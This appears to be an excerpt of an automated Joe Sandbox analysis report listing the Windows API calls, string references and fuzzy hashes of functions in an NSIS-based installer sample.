                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                    • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00075000,00000064,00136FFC), ref: 00403295
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00830828), ref: 00402387
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$QuarterWalt
                                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-2380928645
                                                                                                                                                                                                                                                                                                    • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
